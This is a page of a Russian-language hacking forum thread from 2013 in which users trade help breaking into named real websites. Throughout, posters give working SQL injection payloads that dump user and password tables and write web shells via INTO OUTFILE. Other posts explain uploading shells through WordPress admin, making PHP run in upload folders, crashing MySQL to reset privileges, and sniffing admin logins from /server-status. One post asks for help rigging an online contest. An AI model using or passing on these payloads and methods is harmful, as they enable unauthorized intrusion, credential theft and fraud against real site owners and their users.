PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 [91] 92 93 94 95 96 97 98

er9j6@
06.06.2013, 00:50
stan_q said:
Есть инъекция, file_priv=y. Как можно узнать абсолютный путь к сайту, при условии, что вывод ошибок отключен, в httpd.conf отсылка типа Include "/etc/httpd/vhosts/*.conf", а угадать *.conf не получается?


load_file('/etc/passwd')

так иногда можно через скулю путь посмотреть

stan_q
06.06.2013, 01:14
er9j6@ said:
load_file('/etc/passwd')
так иногда можно через скулю путь посмотреть


Нет, тоже не помогает. Отсылка на /home/username/, а мои сайты находятся/var/www/html/дальше не знаю/

ЗЫ Почему-то при написании в адресной строке браузера load_file('/etc/passwd') сайт подвисает, а если захексить - то все норм. И такое на всех сайтах и всех основных браузерах...

er9j6@
06.06.2013, 01:18
stan_q said:
Нет, тоже не помогает. Отсылка на /home/username/, а мои сайты находятся/var/www/html/дальше не знаю/


Тогда в базе поищи, например у Joomla в таблице jos_session и колонка data путь прописан

LomasterII
06.06.2013, 20:20
подскажите, это инъекция? в конце fid


http://onlineracer.softgames.de/softgames/mobile/index_softgames.php?token=8EFCF9FAD3B2A421038C4CE2 FB2DC0C7&sig=D8849E4E00B50E2E120D56366B072D1E&api_id=2446802&referrer=user_apps&method=getenemygarage&fid=1'


(пробелы убрать)

если да, то как от туда данные вытащить? пробовал, не получается

qaz
06.06.2013, 21:16
stan_q said:
Нет, тоже не помогает. Отсылка на /home/username/, а мои сайты находятся/var/www/html/дальше не знаю/


дальше и на угад можно, ведь не такуж и много вариантов, советую почитать

http://mh-proxy.ru/blog/index.php?mod=read&id=15


LomasterII said:
подскажите, это инъекция? в конце fid
(пробелы убрать)
если да, то как от туда данные вытащить? пробовал, не получается




PHP:
http://onlineracer.softgames.de/softgames/mobile/index_softgames.php?token=8EFCF9FAD3B2A421038C4CE2 FB2DC0C7&sig=D8849E4E00B50E2E120D56366B072D1E&api_id=2446802&referrer=user_apps&method=getenemygarage&fid=1+and%28select*from%28select%28name_const%28ve rsion%28%29,1%29%29,name_const%28version%28%29,1%2 9%29a%29and%281%29=%201

column name '5.1.63-0+squeeze1-log''

HAXTA4OK
07.06.2013, 00:09
stan_q said:
Есть инъекция, file_priv=y. Как можно узнать абсолютный путь к сайту, при условии, что вывод ошибок отключен, в httpd.conf отсылка типа Include "/etc/httpd/vhosts/*.conf", а угадать *.conf не получается? Логи не открываются, видимо, нет прав на чтение.


пытайся найти phpinfo

Sidarovich1975
07.06.2013, 22:22
stan_q said:
Есть инъекция, file_priv=y. Как можно узнать абсолютный путь к сайту, при условии, что вывод ошибок отключен, в httpd.conf отсылка типа Include "/etc/httpd/vhosts/*.conf", а угадать *.conf не получается? Логи не открываются, видимо, нет прав на чтение.


1)Попробуй

/etc/httpd/vhosts/default.conf

/etc/httpd/vhosts/(домен).conf

2)Прогони сканером директорий на стандартные пути к файлу с phpinfo(); (часто оставляют в корне web директории что-нибудь типа info.php, phpinfo.php, 1.php, и так далее) . там можно будет прочитать путь.

3) Посмотри что еще за сайты на сервере (можно здесь http://madnet.name/tools/madss/ ), спровоцируй ошибку на других доменах, так же попробуй найти на них пхпинфо, по шаблону подобрать путь к основной жертве.

infoseller
08.06.2013, 10:33
testvanieva.kz/login.php?language=../index

дальше можно как-нибудь?

trololoman96
11.06.2013, 01:03
http://copywri[delete]terbox.com/announcement.php?id=4+and+5=5
http://copyw[delete]riterbox.com/article.php?id=25+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18--


Кто может раскрутить это не блайндом а чтобы вывод был нормальный ? Там походу какойто фильтр на union

Для авторизации trol@mailforspam.com:123456

Massay
15.06.2013, 02:03
del/

passwd
17.06.2013, 13:27
Приветствую мужики! Есть доступ в админку WordPress. Заливаю шелл через Plugin Insallation. Смотрю в Library путь к этому шеллу. Захожу на него и получаю 403 You don't have permission to access... Почему такое происходит? И как решить данную проблему? Спасибо.

qaz
17.06.2013, 14:04
passwd said:
Приветствую мужики! Есть доступ в админку WordPress. Заливаю шелл через Plugin Insallation. Смотрю в Library путь к этому шеллу. Захожу на него и получаю 403 You don't have permission to access... Почему такое происходит? И как решить данную проблему? Спасибо.


потомучто в хтаккесс запрещен посиотр дериктории, залейся в корень $_SERVER['DOCUMENT_ROOT']

passwd
17.06.2013, 14:09
OxoTnik said:
залить в другую дерикторию, в шаблон например мини шелл


А как в другую директорию залить? Если вместе с темой, то она автоматом падает zip архивом в дефолтную папку. И лежит там простым архивчиком. Для установки темы нужен ftp пароль. В Media Settings убрал галочку с "Organize my uploads into month- and year-based folders". Начало заливать всё в wp-content/uploads, но оттуда так же 403 выдает. Мини шелл так же блокируется.

qaz
17.06.2013, 14:15
passwd said:
А как в другую директорию залить? Если вместе с темой, то она автоматом падает zip архивом в дефолтную папку. И лежит там простым архивчиком. Для установки темы нужен ftp пароль. В Media Settings убрал галочку с "Organize my uploads into month- and year-based folders". Начало заливать всё в wp-content/uploads, но оттуда так же 403 выдает. Мини шелл так же блокируется.


зачем же так извращатся? залей через редактирование шаблона,

passwd
17.06.2013, 14:18
С удовольствием залил бы, но при редактировании шаблонов, и плагинов: "You need to make this file writable before you can save your changes."

Так как залить в корень? Подскажет кто?

biaktrisa
17.06.2013, 15:40
кто может помочь есть сайт (в личку) CMS Айсберг (если я правильно определил), в havaj 1.6 инъекция раскручивается нормально, но вот понять где в БД пароль хранится и хранится ли он вообще в БД не пойму. уже несколько дней изучаю их БД успехов ноль.

biaktrisa
17.06.2013, 16:11
OxoTnik said:
может в другой БД?


сразу подумал об этом, но там только одна БД

кстати вход в админку там через CPanel, может это как то поможет

passwd
17.06.2013, 17:03
OxoTnik said:
редактировать пути для плагинов пробовал?


А где их можно отредактировать? В "Permalink Settings"? Там ведь вроде только URL редактируются.

passwd
17.06.2013, 17:11
biaktrisa said:
сразу подумал об этом, но там только одна БД
кстати вход в админку там через CPanel, может это как то поможет


Cpanel - это не совсем админка сайта. Это что-то на подобие админки хостинга.

Найти админку можешь с помощью такого php скрипта

[PHP]
PHP:
[COLOR="#0000BB"][COLOR="#007700"]

J.Z.
18.06.2013, 06:06
Получил доступ к админ панели одного сайта, пытаюсь залить шелл, нашел только одну папку в которую можно залить. Залил, казалось бы все ок. Пробую выполнить залитый шелл, вываливается такая шляпа:


Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster@rockunion.ie and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


.htaccess'a в папке не лежит, кто что может предложить?

P.s. любые файлы на пыхе работать категорически отказываются.

biaktrisa
18.06.2013, 13:05
passwd said:
Найти админку можешь с помощью такого php скрипта


эти пути уже давно пробил результат 0


passwd said:
А пароль и имя пользователя чаще всего хранятся в таблицах:
user, users, admin, admin_users, login и т.д.
Тебе же нужно просто просмотреть все таблицы и найти хоть что-то где может быть написано password, pwd, passwd.


все найденные уже пробил, паролей 0 их вообще нет, хотя кое какие логины нашел

qaz
18.06.2013, 13:13
J.Z. said:
Получил доступ к админ панели одного сайта, пытаюсь залить шелл, нашел только одну папку в которую можно залить. Залил, казалось бы все ок. Пробую выполнить залитый шелл, вываливается такая шляпа:
.htaccess'a
в папке не лежит, кто что может предложить?
P.s. любые файлы на пыхе работать категорически отказываются.


залей свой хтаккес с разришением выполнеения пыха в картинках


biaktrisa said:
эти пути уже давно пробил результат 0
все найденные уже пробил, паролей 0 их вообще нет, хотя кое какие логины нашел


значит сайт без админки, поетому и паролей нет

Evil_Genius
18.06.2013, 13:15
Есть сайт с уязвимым полем &id=5151

Ставлю в конце ковычку одинарную &id=5151' - вот что получаю в ответ:

MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 1

Query: SELECT `id`, `name`, `uniqum`, `image`, `catsID` FROM `ap_products` WHERE `enable`=1 AND `id` IN(0,5151')

Есть исходный код данного участка кода:


PHP:
$sql='SELECT `id`, `name`, `uniqum`, `image`, `catsID`,`in_stock`,`cant_buy` FROM `'.$DB_pref ix.'products` WHERE `enable`=1 AND `id` IN ( 0,';

foreach($BasketAS$code=>$bskt)

$sql.=$code.',';

$sql=substr($sql,0,-1).')';

$sql=query($sql);

Подскажите, как правильно составить запрос, чтобы выполнилась скуль?

BigBear
19.06.2013, 22:12
Ставлю в конце ковычку одинарную &id=5151' - вот что получаю в ответ:
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 1
Query: SELECT `id`, `name`, `uniqum`, `image`, `catsID` FROM `ap_products` WHERE `enable`=1 AND `id` IN(0,5151')


Думаю, нужно попробовать так

&id=5151)+and+1=2+union+select+111,222,333,444,555+--+

Ну и понеслась...

Ereee
22.06.2013, 17:57
Имеется сайт с sql injection вида:

http://site/id/5

Комменты не срабатывают. Пришлось проэксплуатировать баг так:

http://site/id/5'and(mid(version(),1,1)=5)and'1

Как все это дело автоматизировать в sqlmap? ЧПУ...

Rurr
24.06.2013, 13:04
как правильно составить запрос в vBulletin 4.0.3 что бы получить префикс к таблицам?


&cat[0]=1) union select concat(username,0x3a,email,0x3a,password,0x3a,salt ) from user where usergroupid=6#


вот так ошибка в исходнике страници пишет что такой таблици не существует

er9j6@
24.06.2013, 13:12
Rurr said:
как правильно составить запрос в vBulletin 4.0.3 что бы получить префикс к таблицам?
вот так ошибка в исходнике страници пишет что такой таблици не существует


&cat[0]=1) union select table_name from information_schema.tables limit 0,1#

и перебирай через limit пока свою таблицу не найдешь.

Rurr
24.06.2013, 13:15
А чуть выше префикс написан парой строчек выше верно?


а это не имя базы разве?

Evil_Genius
24.06.2013, 14:26
Есть скуль MySQL error based

.php?avto=5+and(select+1+from(select+count(*),conc at((select+(select+concat(0x7e,0x27,unhex(Hex(cast (user()+as+char))),0x27,0x7e))+from+`information_s chema`.tables+limit+0,1),floor(rand(0)*2))x+from+` information_schema`.tables+group+by+x)a)+and+1=1

При таком запросе, вытает:

Ошибка SQL запросаDuplicate entry '~'user_mysql@localhost'~1' for key 'group_key'

Подскажите как правильно составить запрос чтобы залить напрямую шелл? Знаю полный путь и что file_priv = Y

qaz
24.06.2013, 14:43
Evil_Genius said:
Есть скуль MySQL error based
.php?avto=5+
and(select+1+from(select+count(*),concat((select+( select+concat(0x7e,0x27,unhex(Hex(cast(user()+as+c har))),0x27,0x7e))+from+`information_schema`.table s+limit+0,1),floor(rand(0)*2))x+from+`information_ schema`.tables+group+by+x)a)+and+1=1
При таком запросе, вытает:
Ошибка SQL запросаDuplicate entry '~'
user_mysql@localhost
'~1' for key 'group_key'
Подскажите как правильно составить запрос чтобы залить напрямую шелл? Знаю полный путь и что file_priv = Y



клац (http://mh-proxy.ru/blog/index.php?mod=read&id=15)

Evil_Genius
24.06.2013, 15:18
Ну вот я делаю по такому плану чтобы узнать file_priv:

597+and(select+1+from(select+count(*),concat((sele ct+(select+concat(0x7e,0x27,grant_priv,0x27,0x7e)) +from+mysql.user+where+user='root'+limit+0,1),floo r(rand(0)*2))x+from+`information_schema`.tables+gr oup+by+x)a)+and+1=1

Мне выдает:

Ошибка SQL запроса Duplicate entry '~'Y'~1' for key 'group_key'

Далее делаю заливку файла:

597+and(select+1+from(select+count(*),concat((sele ct+(select+concat(0x7e,0x27,'123456',0x27,0x7e))+f rom+mysql.user+into+outfile+'/var/www/admin/data/www/site.ru/news/images/1.txt'+limit+0,1),floor(rand(0)*2))x+from+`informa tion_schema`.tables+group+by+x)a)+and+1=1

На что мне выдает:

Ошибка SQL запроса You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and' at line 1

Где ошибка?

Ravenous
24.06.2013, 16:14
Evil_Genius said:
Ну вот я делаю по такому плану чтобы узнать file_priv:
597
+and(select+1+from(select+count(*),concat((select+ (select+concat(0x7e,0x27,grant_priv,0x27,0x7e))+fr om+mysql.user+where+user='root'+limit+0,1),floor(r and(0)*2))x+from+`information_schema`.tables+group +by+x)a)+and+1=1
Мне выдает:
Ошибка SQL запроса Duplicate entry '~'
Y
'~1' for key 'group_key'
Далее делаю заливку файла:
597
+and(select+1+from(select+count(*),concat((select+ (select+concat(0x7e,0x27,'123456',0x27,0x7e))+from +mysql.user+into+outfile+'/var/www/admin/data/www/site.ru/news/images/1.txt'+limit+0,1),floor(rand(0)*2))x+from+`informa tion_schema`.tables+group+by+x)a)+and+1=1
На что мне выдает:
Ошибка SQL запроса You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near
'limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and'
at line 1
Где ошибка?


в blind sql-inj, это делается, как правило таким образом


Code:
?var=data' LIMIT 1 INTO OUTFILE '/home/path/site/shell.php' LINES TERMINATED BY ''-- 1

Ereee
24.06.2013, 16:18
Evil_Genius said:
Где ошибка?


Ты узнаешь grant_priv, а не file_priv. И зачем писать запрос для вывода ошибки, если можно выполнить простой подзапрос?


Code:
+and(select'123'into+outfile+'/tmp/gg.txt')+and+1=1

Havij+Sniffer = Bad.

P.S. Нашел сайт, льется нормально:

news/images/aa.php?a=phpinfo();

preno
24.06.2013, 23:12
Есть проблема:

SQL фильтрует скобки () то есть запрос просто останавливается… впринципе возможно раскрутить и без скобок в особом случае, но и тут облом - при выводе из базы она ругается на несоответствующий тип данных, то есть информацию из базы надо конвертировать во что то, а конверт функции разумеется юзают (), поэтому как быть, я затрудняюсь.

Как быть?

winstrool
25.06.2013, 00:52
Может попробовать на прямую сделать запрос на стандартные пользовательские таблы или как вариант за хексить колонки, там не используются скобки, следущий как вариант попробовать найти подзапрос на вывод таблы, изредко но поподается, если есть префикс при выводе ошибки и знакомая цмс, то оброщайся на прямую, бывают еще такие случаи что подобные ошибки в скулях индексируются ПС, т.е как вариант...

preno
25.06.2013, 01:03
winstrool said:
Может попробовать на прямую сделать запрос на стандартные пользовательские таблы или как вариант за хексить колонки, там не используются скобки, следущий как вариант попробовать найти подзапрос на вывод таблы, изредко но поподается, если есть префикс при выводе ошибки и знакомая цмс, то оброщайся на прямую, бывают еще такие случаи что подобные ошибки в скулях индексируются ПС, т.е как вариант...


1) искать подзапросы не вариант, и в нашем случае его однозначно нету.

2) если найти пользовательские таблицы, то будет тоже самое, инфу выводить как? будет несоответствие типов данных.

3) по поводу захексить колонки без () это как? непонел. Покажи пример, пожалуйста.

winstrool
25.06.2013, 01:20
preno said:
1) искать подзапросы не вариант, и в нашем случае его однозначно нету.
2) если найти пользовательские таблицы, то будет тоже самое, инфу выводить как? будет несоответствие типов данных.
3) по поводу захексить колонки без () это как? непонел. Покажи пример, пожалуйста.


пример вывода таблиц:

select 1,2,table_name,3,4 from information_schema.tables limit x,1#

Пример вывода колонок:

select 1,2,column_name,3,4 from information_schema.columns where table_name=0x[hex значение таблы юзеров] limit x,1#

Пример вывода значений из пользовательских табл:

select 1,2,user,password from [пользовательская табла]

С хексом бывает, срабатывают изредко такие слечия:

Пример вывода значений из пользовательских табл:

select 1,2,0x[user],0x[password0] from[пользовательская табла]

preno
25.06.2013, 01:42
winstrool said:
пример вывода таблиц:
select 1,2,table_name,3,4 from information_schema.tables limit x,1#
Пример вывода колонок:
select 1,2,column_name,3,4 from information_schema.columns where table_name=0x[hex значение таблы юзеров] limit x,1#
Пример вывода значений из пользовательских табл:
select 1,2,user,password from [пользовательская табла]
С хексом бывает, срабатывают изредко такие слечия:
Пример вывода значений из пользовательских табл:
select 1,2,0x[user],0x[password0] from[пользовательская табла]


твой пример:

select 0x75736572 from table_user выдаст user но никак не информацию из таблицы table_user

winstrool
25.06.2013, 01:45
preno said:
твой пример:
select 0x75736572 from table_user выдаст user но никак не информацию из таблицы table_user


Каждый случай в скулях индивидуальный, тут экстросенсов вроде как нет!!!

Грабитель
25.06.2013, 01:49
winstrool said:
Пример вывода значений из пользовательских табл:
select 1,2,0x[user],0x[password0] from[пользовательская табла]


Жестко.

YaBtr
25.06.2013, 09:30
preno said:
твой пример:
select 0x75736572 from table_user выдаст user но никак не информацию из таблицы table_user


вместо 0x75736572 попробуй unhex(hex(user))

preno
25.06.2013, 13:14
YaBtr said:
вместо
0x75736572
попробуй
unhex(hex(user))


сказано же - нельзя юзать ()

Вы читайте прежде,чем советовать.

system331
25.06.2013, 19:01
С одного шелла подключился с БД другого сервера, у юзера под которым подключился file_priv=N, но можно изменять данные в БД mysql.user изменил file_priv на Y, но шелл всё равно не заливается. пишет что для моего юзера не хватает прав. Что можно предпринять?

KolosJey
25.06.2013, 22:00
winstrool said:
Пример вывода значений из пользовательских табл:
select 1,2,0x[user],0x[password0] from[пользовательская табла]


Эта пять!

preno, если нужна конвертация - то нужны и скобки. Ничего ты тут не сделаешь, если фильтрует их ваф грамотно. Вопрос в другом, это дествительно ваф? Он дествительно нормально фильтрует? Или это в коде проверка, или что это?

Ну и второй вариант - искать поле вывода, в котором данные нужного типа, а тут как это не странно гений хака даёт единственный правильный ответ за всю историю своих постов :


winstrool said:
Каждый случай в скулях индивидуальный, тут экстросенсов вроде как нет!!!


а я, к своему прискорбию, вынужден заметить, что был не прав, и у него бывают удачные посты!

BigBear
26.06.2013, 07:47
system331 said:
С одного шелла подключился с БД другого сервера, у юзера под которым подключился file_priv=N, но можно изменять данные в БД mysql.user изменил file_priv на Y, но шелл всё равно не заливается. пишет что для моего юзера не хватает прав. Что можно предпринять?


Нужно обновить привелегии. Как это сделать - я писал в своём небольшом обзоре тут (https://rdot.org/forum/showpost.php?p=28278&postcount=21)

На всякий случай - вот копипаст

Итак, если нам вдруг понадобится срочно перезагрузить MySQL, а прав на RELOAD нет, чтобы выполнить

FLUSH PRIVILEGES;

нам могут помочь следующие способы:

Способ №1:

Самый старый из найденных мной, но ни разу нигде не сработавших.

Тем не менее человек на этом форуме утверждает, что это возможно...

Тема 2008 года =)

Кратко: MySQL падает так как надо указывать имя триггера в виде `mydb`.`mytrigger`, а не просто mytrigger.


Code:
mysql> CREATE TRIGGER mytrigger AFTER INSERT
-> ON `mydb`.`mytable` FOR EACH ROW
-> BEGIN END;
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql>

OC = Windows XP SP 2

MySQL 5.0.16

Результат - Способ не отработал.

Способ №2:

Заключается в эксплуатации бага #63775

Кратко: MySQL падает при чтении заголовка, следующего за удалённой записью.


Code:
#
# Bug#13510739 63775: SERVER CRASH ON HANDLER READ NEXT AFTER DELETE RECORD.
#

-- source include/have_innodb.inc

CREATE TABLE bug13510739 (c INTEGER NOT NULL, PRIMARY KEY (c)) ENGINE=INNODB;

INSERT INTO bug13510739 VALUES (1), (2), (3), (4);

DELETE FROM bug13510739 WHERE c=2;

HANDLER bug13510739 OPEN;

HANDLER bug13510739 READ `primary` = (2);

# this one crashes the server IF the bug IS present
HANDLER bug13510739 READ `primary` NEXT;

DROP TABLE bug13510739;


На оффициальном сайте говорится, что пофиксено начиная с версии 5.1.62

Решил испытать на своей системе, где версия MySQL 5.1.61.

Зависимости:

MySQL 3
[/B]

Результат - успешный перезапуск MySQL. PROFIT !!!

system331
26.06.2013, 12:10
BigBear, спасибо, шелл залит.

Сервак на фряхе, gcc нет, Кто-нибудь подскажетт как скомпилировать исходники сплойта под freebsd из под debian )

Br@!ns
26.06.2013, 19:52
Где хранятся файлы паролей от админки Webmin на сервере? и какой алгоритм там?

trololoman96
29.06.2013, 01:06
Почему кавычки передаваемые через гет, пост могут слешироватся ?

При этом мэджик квотес офф, смотрел через пхпинфо.

Переменная эта ничем не обрабатывается, мб гдето в недрах глобально только, ковыряюсь в плагине вордпресса.

В чем может быть проблема ?

HAXTA4OK
30.06.2013, 01:15
trololoman96 said:
Почему кавычки передаваемые через гет, пост могут слешироватся ?
При этом мэджик квотес офф, смотрел через пхпинфо.
Переменная эта ничем не обрабатывается, мб гдето в недрах глобально только, ковыряюсь в плагине вордпресса.
В чем может быть проблема ?


может быть все таки замена по регулярке идет

trololoman96
30.06.2013, 19:52
В самом плагине я не нашел ничего такого.

Там где я нашел типа потенциальную иньекцию обрашения происходят либо через файл wp-admin/admin-ajax.php, в клиентской части. И через админку, через edit.php со своим типом страницы и обработчиками в плагине.

Вот там и происходит экранирование.

Если интересно, могу скинуть плагин в личку и показать те места что нашел. Единственное попрошу не сливать инфу о плагине в паблик, ибо он платный и достаточно популярный в рунете.

wkuzy
30.06.2013, 20:57
Всем привет!

Кто подскажет,есть сайт ......../wechselbude/index.php?page=content&name=info

Если сделать так ......../wechselbude/index.php?page=content&name=(SELECT%20CONCAT(version(),user(),database()) )

то выводит version 5.1.66-nmm3-log

user d01333ce@localhost

db d01333ce

но дальше вообще никак ни через union ни через and,

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/htdocs/w00db281/wechselbude/content/content.php on line 6

wkuzy
30.06.2013, 21:12
Я с этими инклудами вообще не дружу

trololoman96
30.06.2013, 21:58
wkuzy,


http://hammjue.at/wechselbude/index.php?page=content&name=((select table_name from information_schema.tables limit 1,1))

wkuzy
30.06.2013, 22:08
trololoman96 said:
wkuzy,


Спасибо ,дальше я сам

Kirka121
01.07.2013, 18:00
пытаюсь девочке помочь с хреновым контестом.

уверен что саит написан по левому.

кто поможет закачать шелл, или пробить SQL иньекцыю чтоб увеличить девочке колво votes?

саит; http://whowearsitbetter.com/2july.php

помогаю подруге и учусь уму разуму, помошь отблагадорю через paypal.

Kirka121
01.07.2013, 18:24
ты когда в послендии раз первыи пост етои темы читал?

trololoman96
01.07.2013, 23:44
HAXTA4OK said:
может быть все таки замена по регулярке идет


Я нашел проблему. В файле самого вп. В wp-includes/load.php есть такое:


Code:
// Escape with wpdb.
$_GET = add_magic_quotes( $_GET );
$_POST = add_magic_quotes( $_POST );
$_COOKIE = add_magic_quotes( $_COOKIE );
$_SERVER = add_magic_quotes( $_SERVER );

// Force REQUEST to be GET + POST.
$_REQUEST = array_merge( $_GET, $_POST );

и сам код функции add_magic_quotes


Code:
function add_magic_quotes( $array ) {
foreach ( (array) $array as $k => $v ) {
if ( is_array( $v ) ) {
$array[$k] = add_magic_quotes( $v );
} else {
$array[$k] = addslashes( $v );
}
}
return $array;
}

Эта фигня портит всю малину. Я так понимаю что тут уже ничего не сделать ?

Br@!ns
03.07.2013, 09:44
Есть сайт с открытым /server-status, хочу попытаться выловить авторизацию админа, как это лучше сделать? мб можно как нибудь постоянно парсить все результаты выводимые, и через 1-2 дня к примеру проверить этот список?

BigBear
03.07.2013, 12:07
Br@!ns said:
Есть сайт с открытым /server-status, хочу попытаться выловить авторизацию админа, как это лучше сделать? мб можно как нибудь постоянно парсить все результаты выводимые, и через 1-2 дня к примеру проверить этот список?


Ты только адрес админ-панели максимум выловишь.

Не, ну если авторизация идёт через GET - То да, поймаешь аутентификационные данные.

А так, максимум - адрес админ панели.

Voinmraka
03.07.2013, 20:18
есть Phpmyadmin: 3.3.7deb7

можно ли на нем раскрыть пути? есть права рута

Br@!ns
04.07.2013, 19:50
BigBear said:
Ты только адрес админ-панели максимум выловишь.
Не, ну если авторизация идёт через GET - То да, поймаешь аутентификационные данные.
А так, максимум - адрес админ панели.


Именно так, запросы и через GET тоже идут. Вот и хотелось бы все эти постояннообновляющиеся запросы куда нибудь логировать или парсить в режиме реального времени, возможно ли это как нибудь сделать?

BigBear
05.07.2013, 08:43
Br@!ns said:
Именно так, запросы и через GET тоже идут. Вот и хотелось бы все эти постояннообновляющиеся запросы куда нибудь логировать или парсить в режиме реального времени, возможно ли это как нибудь сделать?


Ну тебе никто не мешает цеплять на страницу /server-status и парсить её содержимое. Хоть запарся.

Единственное что - ты увидешь все запросы как от клиентов, так и от админов, а если сайт высокопосещаемый, то этих запросов будут тысячи, миллионы, сможешь ли ты выловить иголку в стоге сена ???

Самое простое - дождаться когда админ будет в сети, напечатать мат к любой новости и пожаловаться на него. И ждать пока админ его почистит, при этом мониторить /server-status. Если комментарии удаляются через админку - есть шанс увидеть её адрес.

HACKTEAM
06.07.2013, 01:53
ходел исправить чара и наткнулся вот на это http://wow-cool.ru/?ajaxZone=1&module=chars&action=repair&repairChar=237760&repairRelam=fun

что мне с теперь можно с этим делать?

это случайно не скуль инъекция?

прошу не кидать в меня помидорами т.к. я ещё не очень разбираюсь в этом

er9j6@
06.07.2013, 16:20
HACKTEAM said:
ходел исправить чара и наткнулся вот на это http://wow-cool.ru/?ajaxZone=1&module=chars&action=repair&repairChar=237760&repairRelam=fun
что мне с теперь можно с этим делать?
это случайно не скуль инъекция?
прошу не кидать в меня помидорами т.к. я ещё не очень разбираюсь в этом


ничего,но надежда есть всегда. На сервере стоит форум Invision Power Board 3.4,попробуй в привате сплоит поискать

http://forum.wow-cool.ru/admin/upgrade/index.php?app=upgrade&s=&section=index&do=login

zeoman
08.07.2013, 04:27
Возможно не сюда запостил ищу веб шел .ASP веб сервер IIS функционал скромный заливка и правка файлов

Romaz
08.07.2013, 05:29
zeoman said:
Возможно не сюда запостил ищу веб шел .ASP веб сервер IIS функционал скромный заливка и правка файлов


/showthread.php?t=103576

https://rdot.org/forum/showthread.php?t=1116

Br@!ns
08.07.2013, 12:31
http://hawk.ru/toto.php?n_nomer=-3

Можно ли по этой ошибке чо нибудь получить?

er9j6@
08.07.2013, 13:28
Br@!ns said:
http://hawk.ru/toto.php?n_nomer=-3
Можно ли по этой ошибке чо нибудь получить?


Можно блиндом получить

http://hawk.ru/toto_stat_day.php?n_kogda=20120904%20and%20(select %20ord(substr(@@version,1,1))%20)=53

5.0.51-log

diker
09.07.2013, 04:44
help


asiaman said:
Подскажите, кто-нибудь пользовался данной багой?
Если наглядный пример использования?
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1180
Nginx buffer underflow vulnerability
Buffer underflow in src/http/ngx_http_parse.c in nginx 0.1.0 through 0.5.37, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.15 allows remote attackers to execute arbitrary code via crafted HTTP requests.
Affected items
Web Server
The impact of this vulnerability
Remote attackers may execute arbitrary code via crafted HTTP requests.



актуально, что можно с этим сделать

usupekx
10.07.2013, 01:39
Подскажите:

жертва - ttp://www.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=16

узнаю названия таблиц - ttp://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()

узнаю название столбцов - http://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()

на выходе имею такую связку (таблица - user, столбцы - userName,userPass)

ww.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(userPass),3,4,5,6 from users

и получаю:

Invalid query: Unknown column 'userPass' in 'field list'

Уязвимость разбираю из соседнего раздела /threadnav21336-1550-10.html - нашел её YaBTR и вот вариант рабочий:

ttp://www.terrapex.ca/en/nouvelle.php?lanouvelle=&id=22+union+select+1,group_concat(userpwd,0x3a,use r rights),version(),4,5+from+users--

Где и как найти эти userpwd,0x3a,user rights

BlackIce
10.07.2013, 01:54
usupekx said:
Подскажите:
жертва
- ttp://www.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=16
узнаю названия таблиц
- ttp://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()
узнаю название столбцов
- http://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()
на выходе имею такую связку (таблица -
user
, столбцы - userName,userPass)
ww.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(userPass),3,4,5,6 from
users
и получаю:
Invalid query: Unknown column 'userPass' in 'field list'
Уязвимость разбираю из соседнего раздела /threadnav21336-1550-10.html - нашел её
YaBTR
и вот вариант рабочий:
ttp://www.terrapex.ca/en/nouvelle.php?lanouvelle=&id=22+union+select+1,group_concat(
userpwd,0x3a,user rights
),version(),4,5+from+users--
Где и как найти эти
userpwd,0x3a,user rights


может просто внимательней быть?

>>Где и как найти эти userpwd,0x3a,user rights

0x3a - это хекс код разделителя, а остальные - названия столбцов таблицы. Как найти написано в статье Dr.Zero

usupekx
10.07.2013, 02:45
BlackIce said:
может просто внимательней быть?
>>Где и как найти эти userpwd,0x3a,user rights
0x3a - это хекс код разделителя, а остальные - названия столбцов таблицы. Как найти написано в статье Dr.Zero


действительно, описАлся. Но, увы, не помогло

читал не раз статью эту и нетолько её. про хекс это понятно, просто вставил.

попробую конкретнее задать вопрос. может ли быть такое что только брут форсом будут подобраны названия столбцов? Или всё-таки их можно выудить?

Expl0ited
10.07.2013, 04:40
usupekx said:
Подскажите:
жертва
- ttp://www.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=16
узнаю названия таблиц
- ttp://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()
узнаю название столбцов
